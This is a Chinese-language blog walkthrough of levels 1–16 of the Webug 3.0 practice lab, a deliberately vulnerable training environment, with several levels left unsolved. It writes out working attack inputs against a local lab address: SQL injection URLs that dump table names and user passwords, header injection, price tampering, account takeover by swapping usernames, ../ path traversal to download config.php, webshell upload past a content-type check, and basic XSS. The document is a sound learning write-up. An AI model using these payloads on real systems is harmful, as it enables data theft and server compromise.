Webug3.0 初级攻略 1-16关

虚拟机下载路径:

链接:https://pan.baidu.com/s/19234CirAiVf3H820uWWNeg 

提取码:7jfs 

  • 第一关:很简单的一个注入

Webug3.0 初级攻略 1-16关_第1张图片

 

使用firefox 可以使用一个叫hackbar的插件,方便注入语句的测试

1.提交 ' 报错,可能存在注入点

 

Webug3.0 初级攻略 1-16关_第2张图片

还是一个字符型的注入漏洞

测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1'

 

2.提交 1' or 1='1 会显示出所有信息

 

Webug3.0 初级攻略 1-16关_第3张图片

测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' or 1='1

 

3. 使用order by 语句可以猜解这个数据表有多少个字段,目测就是4个了,当然有可能不是select * from tables_name:

order by 1

order by 2

order by 3 ······· 这个例子在order by 1--4 都是能够正确回显,直到order by 5 会出现报错,如图:

 

Webug3.0 初级攻略 1-16关_第4张图片

即这个表含有4个字段

该例子使用的测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' or 1=1 order by 5-- -

 

4. 使用联合查询 union select 出现显示位

Webug3.0 初级攻略 1-16关_第5张图片

测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,3,4-- -

此时也可以顺带把数据库的版本号,用户,和当前的数据库名字给查出

 

Webug3.0 初级攻略 1-16关_第6张图片

测试语句 http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,database(),version(),user()#

 

5.查表和列名

Webug3.0 初级攻略 1-16关_第7张图片

表名都显示出来了,有comment,flag,good,user 4个表

测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()-- -

 

Webug3.0 初级攻略 1-16关_第8张图片

显示出了user表的列名:uid,uname,pwd,bill

测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name ='user'-- -

 

6.拖库

Webug3.0 初级攻略 1-16关_第9张图片

将user表的帐号密码给爆出来了

测试语句:http://172.27.73.13/pentest/test/sqli/sqltamp.php?gid=1' union select 1,2,group_concat(uname),group_concat(pwd) from user-- -

小结:当然我们还可以使用sqlmap的自动化工具来实验sql注入的测试,上述步骤主要是人工进行测试,后面会补充sqlmap是实现。 

 

  • 第二关 从图片中找有用的信息--未解决

Webug3.0 初级攻略 1-16关_第10张图片

第一眼的感觉,是不是一句话木马呀?

下载右键查询一下图片数据发现!!!

Webug3.0 初级攻略 1-16关_第11张图片

123.txt 密码 123 ???

将123.jpg改成123.rar,里面果然有一个123.txt的文档,里面的内容就是密码:123,如图

Webug3.0 初级攻略 1-16关_第12张图片

将123 提交数据,既然报错

 

Webug3.0 初级攻略 1-16关_第13张图片

小结:不知道是什么原因了,再看看网上面的大神怎么说吧。后续再补充结果。

 

  • 第三关 渗透网站的时候目录也很重要

Webug3.0 初级攻略 1-16关_第14张图片

题目说目录也很重要,是不是让我们扫描一下目录,顺便查看了一下这个页面的源码,果然是叫我们去扫描目录

Webug3.0 初级攻略 1-16关_第15张图片

该页面的路径为:http://172.27.73.13/pentest/test/san/index33.htm

用burpsuite扫描了一下目录,发现:

 

Webug3.0 初级攻略 1-16关_第16张图片

还有个一个叫test的文件和目录,路径替换一下咯

 

Webug3.0 初级攻略 1-16关_第17张图片

又弹出一个提示,用md5加密目录名?目录名应该就是test了

 

然后用test的md5密文 4621d373cade4e83 替换 test 看看出现什么

Webug3.0 初级攻略 1-16关_第18张图片

真是一个大傻逼了

 

  • 第四关 当遇到五位验证码的时候可以爆破

Webug3.0 初级攻略 1-16关_第19张图片

同标题没有任何关系啊,木有验证码,可能是让我们去爆破一下用户名密码吧,找找弱口令字典吧,顺带用burpsuite看看是不是帐号密码都是明文传输 ?

Webug3.0 初级攻略 1-16关_第20张图片 

然而真的是明文传输,那就直接爆破吧。

tips : 使用burpsuite爆破密码的时候,如果想快速定位正确的帐号密码,可以使用grep的功能,截取关键字。

Webug3.0 初级攻略 1-16关_第21张图片 

帐号密码,爆破出来了,admin / admin123

小结:burpsuit的爆破功能还是比较好用的。 

 

  • 第五关 一个特殊的注入,头部注入

说到http头部注入,一般有下列几类:

1.User-agent 浏览器版本 (少)

2.Referer 来源(少)

3.X-Forwarded-For 获取ip(高)

4.client_ip 获取ip(高)

可以测试一下 x-forwarded-for (xff)头部注入

burpsuite捉取请求

在repeater 修改请求 增加 X-Forwarded-For:127.0.0.1 看看返回什么,如图:

 Webug3.0 初级攻略 1-16关_第22张图片

返回有数据库查询错误

那就可以构造语句获取数据库相关信息了

Webug3.0 初级攻略 1-16关_第23张图片

最后像第一关那样构建数据库注入语句就可以了或者相关信息了。

 

  • 第六关 支付问题:用最少的钱去购买到一本书

Webug3.0 初级攻略 1-16关_第24张图片 

直接burpsuite抓包修改价格吧,现在余额是40.9

先抓个包看看看看是怎样一个情况

Webug3.0 初级攻略 1-16关_第25张图片

抓取到了,买99999999本,那么我把价格bill1 =10 更改为0,那就是0元购买

 Webug3.0 初级攻略 1-16关_第26张图片

再回到浏览器上看看情况吧

Webug3.0 初级攻略 1-16关_第27张图片小结:此前某电商的确爆出过类似这样的漏洞,任意修改金额数量的

 

  • 第七关 越权 

题目说明 :已知帐号密码 tom/123456

使用tom / 123456登陆后,观察url

 Webug3.0 初级攻略 1-16关_第28张图片

用户名显示在url

捉包看看情况吧

Webug3.0 初级攻略 1-16关_第29张图片

若将包的用户名tom 修改为管理员admin,看看密码能否修改?发送去repeater修改

Webug3.0 初级攻略 1-16关_第30张图片

好像是成功了,重新登陆看看是不是将密码改为88888了

 

Webug3.0 初级攻略 1-16关_第31张图片

 

  • 第八关 CSRF -未解决

CSRF 模拟一个修改密码的页面诱导管理员点击页面,达到修改密码的目的,这里可以先构造一个页面

使用burpsuite可以构造一个csrf页面

 Webug3.0 初级攻略 1-16关_第32张图片

将admin用户 密码修改为admin

copy html 生成csrf.html 页面上传到服务器,点击,然而并不能修改密码,再找找大神看看什么原因

 

  • 第九关 URL跳转

不明白,看源码

Webug3.0 初级攻略 1-16关_第33张图片 

就是传输一个url参数吧

 

url 构造成这个样子

Webug3.0 初级攻略 1-16关_第34张图片

就是真样子吗?

 

  • 第十关 文件下载

路径不对哇,真实路径应该是 http://172.27.73.13/pentest/test/6/1/download.php

Webug3.0 初级攻略 1-16关_第35张图片 

题目标题说是帮管理员找回mysql的密码,那么应该就是寻找配置文件了,遍历一下网站目录,发现

http://172.27.73.13/pentest/test/6/1/db/ 下有一个config.php 的文件,但是不能直接下载

我们可以尝试使用download.php来尝试下载,但是路径是不对的,试下利用../来进行路径跳转!

tips:./ 当前目录 ../ 父级目录 / 根目录

尝试一下构造路径,这里phpinfo.php是在根目录下(WWW)的,而点击“点我下载”的时候,会出现文件不存在报错,且也把路径给暴露出来了

即返回3层父目录就可以了

Webug3.0 初级攻略 1-16关_第36张图片

测试成功,证明这个download.php是可以进行下载的,现在构造config.php的路径了

Webug3.0 初级攻略 1-16关_第37张图片

路径:http://172.27.73.13/pentest/test/6/1/download.php?fname=../../../pentest/test/6/1/db/config.php

Webug3.0 初级攻略 1-16关_第38张图片 

帐号密码出来了

小结:这里存在两个漏洞吧,一个是文件下载,一个是目录遍历

 

  • 第十一关 文件下载,和第十关有点不同

Webug3.0 初级攻略 1-16关_第39张图片 

点击下载,路径啥都没变,要就抓包看看情况吧

 

Webug3.0 初级攻略 1-16关_第40张图片 

这里直接修改pic参数,直接根据上一踢的config.php路径来构造吧。

 Webug3.0 初级攻略 1-16关_第41张图片

Webug3.0 初级攻略 1-16关_第42张图片

 

  • 第十二关 我系统密码忘记了!--未解决

登陆帐号后

Webug3.0 初级攻略 1-16关_第43张图片 

应该就是一句话木马了,上传一句话木马后,用菜刀神器就系获取服务器的sheel,不知道为什么暂时获取不了,可能是菜刀失灵了。都有可能是工具问题,后面再试一下。

 

  • 第13 14关 xss

13是反射型xss,14是存储型xss,就将这两个关卡放在一起写了,估计需要截图的地方不多

13 反射型xss

 Webug3.0 初级攻略 1-16关_第44张图片

直接修改url,弹框吧,还是没有过滤的最基础的xss语句,

Webug3.0 初级攻略 1-16关_第45张图片 

14 存储型xss

Webug3.0 初级攻略 1-16关_第46张图片 

一个留言区,直接写入xss语句 估计也是没有过滤的,看看效果

Webug3.0 初级攻略 1-16关_第47张图片 

还是弹出了,但是速度有点慢呢。

 

  • 第十五关 什么?图片上传不了?

哈 这题目有点搞笑,我真实上传一个图片发现,真的jpg反而上传不了

Webug3.0 初级攻略 1-16关_第48张图片 

那就看看源码吧

Webug3.0 初级攻略 1-16关_第49张图片 

这里是说 要type是需要image的,但是文件名是需要php后缀,一句话木马!用burpsuite改包试下吧

Webug3.0 初级攻略 1-16关_第50张图片 

将content-type 改为image/jpge 就可以了吧,试下

Webug3.0 初级攻略 1-16关_第51张图片 

上传成功

 

  •  第十六关 明天双11

这题目有点不知道怎么弄

Webug3.0 初级攻略 1-16关_第52张图片

剁手不是去淘宝就去京东吧,那就试下淘宝

Webug3.0 初级攻略 1-16关_第53张图片 

提示只允许10.10.10.10 访问,那就捉包修改host吧

Webug3.0 初级攻略 1-16关_第54张图片 

出现nonono 我就nonono了 不知道怎么接续下去,还是看看源码吧

Webug3.0 初级攻略 1-16关_第55张图片 

源码的条件出来了,原来HTTP_REFERER 还需要是www.baidu.com

直接 改包吧

Webug3.0 初级攻略 1-16关_第56张图片 

Webug3.0 初级攻略 1-16关_第57张图片 

最后提交flag

 

 

最后:初级试题已经完成,后面再做下中级的试题,一直希望官方能出个正式的教程,让我们这些初学者学习一下。

你可能感兴趣的:(网络安全,web安全,渗透测试,web靶场)